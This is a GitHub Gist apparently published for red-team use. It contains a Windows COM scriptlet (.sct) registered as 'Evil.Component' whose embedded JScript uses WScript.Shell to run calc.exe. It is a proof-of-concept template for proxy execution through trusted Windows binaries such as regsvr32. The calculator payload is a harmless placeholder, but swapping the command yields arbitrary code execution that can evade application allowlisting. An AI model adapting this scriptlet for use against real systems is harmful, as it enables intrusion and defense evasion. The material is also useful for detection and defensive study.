Last active
September 2, 2019 22:47
-
-
Save kafkaesqu3/3b42570949947d0a1207f62a20a6ef55 to your computer and use it in GitHub Desktop.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?XML version="1.0"?> | |
<scriptlet> | |
<registration | |
description="Evil.Component" | |
progid="Evil.Component" | |
version="1" | |
classid="{69486DD6-C19F-42e8-B508-A53F9F8E67B8}" | |
remotable="true" | |
> | |
</registration> | |
<script language="JScript"> | |
<![CDATA[ | |
var r = new ActiveXObject("WScript.Shell").Run("calc.exe"); | |
]]> | |
</script> | |
</scriptlet> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment